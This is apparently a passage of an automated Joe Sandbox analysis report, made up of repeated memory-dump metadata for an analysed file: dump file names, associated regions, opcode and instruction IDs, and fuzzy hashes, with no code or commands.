                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8efae6540d4994eeec831f08619b4e9b8055b92166caa3aace5c2e4e29003137
                                        • Instruction ID: 037188e0c9008f2acf7a5441686a7dfc5b5ccffca3409f7752350054a93ec0b0
                                        • Opcode Fuzzy Hash: 8efae6540d4994eeec831f08619b4e9b8055b92166caa3aace5c2e4e29003137
                                        • Instruction Fuzzy Hash: EEE1E371E002298BDF24CF68E9846EEB7B1FF89320F144229E955E73D2D7349985CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction ID: 5eab13d3c8fe0174ad9cfa72905db7f75f455fd52f5b9ae8575878ae570483af
                                        • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction Fuzzy Hash: 4FF16BA250C6954BC71D9A1884F08BD7FD29FA9201F0E86ADFDD70F383D924DA05DBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction ID: 4ca0ecaae5c6ccdefa9b9a836e598dd645204b7f2edefc3b2597f45af02ddd01
                                        • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction Fuzzy Hash: 0ED155B3F10A254BEB08CA99DC913ADB6E2EBD8350F19413ED916E7381D6B89D0187D0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction ID: 6eac1d35b6f873d3691efee3f15d93f6716b9be7cab17f56444ac31264a9edef
                                        • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction Fuzzy Hash: 6F026B74E006598FCF16CFA8C4905EDBBB6FF8D310F548159E899AB355C730AA91CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction ID: b46a09acdd752b502630e195cb420d2c96de276fbd40f4a36dbae10978cc06d3
                                        • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction Fuzzy Hash: 1A021675E00A19CFCF15CF98C8809ADB7B6FF88350F258169E809AB355D731A991CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction ID: 615b80fd13db6250658117c076993e0ca62dc19c5b3d313da7c55c049c3328f7
                                        • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction Fuzzy Hash: A9C16A76E29B924BD717873DD802265F394FFE7294F05D72EFCE472982EB2096818204
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                        • Instruction ID: 9acd0f5d9e215758add863ea6c20fadd470a27e1dadad7569d69c5a36ddfc3ec
                                        • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                        • Instruction Fuzzy Hash: 1DB1F476D05299DFDB21CB64D4523EEBFBAFF52300F198155D444EB282DB3449C68B90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction ID: a69bc3288ab8978728569eae6a499259fa116434a7f7b744ae89d7744b4ca5cd
                                        • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction Fuzzy Hash: 06D11470600B44CFD725CF29C494BA7B7E4FF49304F14896ED89A8BA51DB35E889CB92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                        • Instruction ID: a75937c312dc708b13fb23334a94fc2e12a777c46c3daf14116df3646dac7a90
                                        • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                        • Instruction Fuzzy Hash: 11D12AB01083818FD3548F55C5A472BBFE0FF95748F18895EE8D94B391C7BA8A48DB92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction ID: c587ac717358c48fc85cdf602b8421be32d42606c87a88b61e3ccb8950936ecd
                                        • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction Fuzzy Hash: 12B19372A083555BD308CF25C85136BF7E2EFC8310F1AC93EE99997391D778D9419A82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction ID: ff3ad3518ce824ec3fc2169ef15226938a39a327820d6cfd1e7ebdf882e5927f
                                        • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction Fuzzy Hash: 3CB1B172A093519BD308CF25C49136BF7E2EFCC310F1AC93EA89997291D778D9419A82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction ID: be05d07d203ece13f332318608a29aad64e82bfd1a81081d673911cf43a20aa6
                                        • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction Fuzzy Hash: D1B14A71A093558FD706EE3EC481215F7E5BFEA280F51C72EE895B7662EB31E8818740
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction ID: 9196dbcfa168cc6a9df104156e67196851fdd8d468500c31af0e02504863ed7a
                                        • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction Fuzzy Hash: 7E91C371A00235ABDF14CE68EC80BBAB3A0FF55300F554565E914EB286D732ED85C7A2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction ID: 478e408eeece189eb1566c426a1580b1f7f78840804e70caf6a997d15220faef
                                        • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction Fuzzy Hash: AEB11A316106099FDB15CF28C48AB657BA1FF85364F29865CE8D9CF2A2C375D991CB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction ID: 94d89d48ead8b5b682260b232e440373dc2c6c55b886ce6fcaaed695790cab26
                                        • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction Fuzzy Hash: A0C14A75A04B1A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction ID: 5b31ac2234037c0e238853b5cf024e35ba4d51afd313c3a285a2adc016054031
                                        • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction Fuzzy Hash: 3B9158319287946AEB168B3CCC417BAB798FFE6350F14C72AF998B2491FB7185C18345
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c009f72429bb7e0b004943efe85be61bf3ab7305df2c9d1f4204ad0cd4c4838f
                                        • Instruction ID: 6443d4956d1668c4d3749b3716b10680ed04763790aee8a2f1ea1b8d8271e76c
                                        • Opcode Fuzzy Hash: c009f72429bb7e0b004943efe85be61bf3ab7305df2c9d1f4204ad0cd4c4838f
                                        • Instruction Fuzzy Hash: BB7125F3D082249FE3146E29DC4573ABBE9DBD4710F2A863DEAC893344E9755C0186C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction ID: a1cc8334da7ffb9c75be3c5a2743ce2796ae9d9b6f1e1b45e2c2c82cade02984
                                        • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction Fuzzy Hash: 86A13072900B29CBEB19CF55DCC5A5ABBB1FB54314F14C22AD41AE72A0D334A984CF94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction ID: 48da4c0f7b7a848fe37d241ec4e32128b62fd79eb9e0bec8438fd8a4bb3d2763
                                        • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction Fuzzy Hash: 5EA16D72E083559BD308CF25C89075BF7E2EFC8710F1ACA3DA8999B254D774E9419B82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
